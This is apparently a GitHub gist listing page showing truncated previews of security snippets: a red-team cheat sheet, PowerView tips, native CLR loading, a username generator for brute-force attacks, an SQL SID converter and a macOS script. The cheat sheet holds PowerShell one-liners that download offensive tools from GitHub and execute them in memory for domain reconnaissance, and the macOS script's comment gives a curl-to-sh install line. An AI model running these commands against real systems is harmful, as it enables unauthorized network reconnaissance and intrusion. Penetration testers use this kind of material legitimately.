Skip to content

Instantly share code, notes, and snippets.

View jgoosey's full-sized avatar

Jon Goss jgoosey

10 followers · 51 following
View GitHub Profile
@m8sec
m8sec / RedTeam_CheatSheet.ps1
Last active April 1, 2026 22:40
Red Team CheatSheet
# Domain Recon
## ShareFinder - Look for shares on network and check access under current user context & Log to file
powershell.exe -exec Bypass -C "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellEmpire/PowerTools/master/PowerView/powerview.ps1');Invoke-ShareFinder -CheckShareAccess|Out-File -FilePath sharefinder.txt"
## Import PowerView Module
powershell.exe -exec Bypass -noexit -C "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/dev/Recon/PowerView.ps1')"
## Invoke-BloodHound for domain recon
powershell.exe -exec Bypass -C "IEX(New-Object Net.Webclient).DownloadString('https://raw.githubusercontent.com/BloodHoundAD/BloodHound/master/Ingestors/SharpHound.ps1');Invoke-BloodHound"
@xpn
xpn / clr_via_native.c
Created April 11, 2018 21:34
A quick example showing loading CLR via native code
#include "stdafx.h"
int main()
{
ICLRMetaHost *metaHost = NULL;
IEnumUnknown *runtime = NULL;
ICLRRuntimeInfo *runtimeInfo = NULL;
ICLRRuntimeHost *runtimeHost = NULL;
IUnknown *enumRuntime = NULL;
LPWSTR frameworkName = NULL;
@HarmJ0y
HarmJ0y / PowerView-3.0-tricks.ps1
Last active May 12, 2026 05:54
PowerView-3.0 tips and tricks
# PowerView's last major overhaul is detailed here: http://www.harmj0y.net/blog/powershell/make-powerview-great-again/
# tricks for the 'old' PowerView are at https://gist.github.com/HarmJ0y/3328d954607d71362e3c
# the most up-to-date version of PowerView will always be in the dev branch of PowerSploit:
# https://github.com/PowerShellMafia/PowerSploit/blob/dev/Recon/PowerView.ps1
# New function naming schema:
# Verbs:
# Get : retrieve full raw data sets
# Find : ‘find’ specific data entries in a data set
@TheRockStarDBA
TheRockStarDBA / ConvertSQLServerSIDToReadableString.sql
Created November 16, 2015 14:46
convert an SQL Server login SID to a readable string
/*
Ref: http://www.codykonior.com/2015/05/31/how-to-convert-an-sql-login-sid-to-a-readable-string/
Note that if you're doing this on the output from an Audit Login trace (http://www.safesql.com/2015/06/03/sql-server-security-and-renamed-logins/):
Remove the first Case When
Len needs to be replaced with Datalength
sp.sid replaced with al.LoginSid
@superkojiman
superkojiman / namemash.py
Last active March 18, 2026 08:25
Creating a user name list for brute force attacks.
#!/usr/bin/env python3
'''
NameMash by superkojiman
Generate a list of possible usernames from a person's first and last name.
https://blog.techorganic.com/2011/07/17/creating-a-user-name-list-for-brute-force-attacks/
'''
@heisters
heisters / hack.sh
Created April 11, 2012 15:57 — forked from erikh/hack.sh
OSX For Hackers
#!/usr/bin/env sh
##
# This is script with usefull tips taken from:
# https://github.com/mathiasbynens/dotfiles/blob/master/.osx
#
# install it:
# curl -sL https://raw.github.com/gist/2108403/hack.sh | sh
#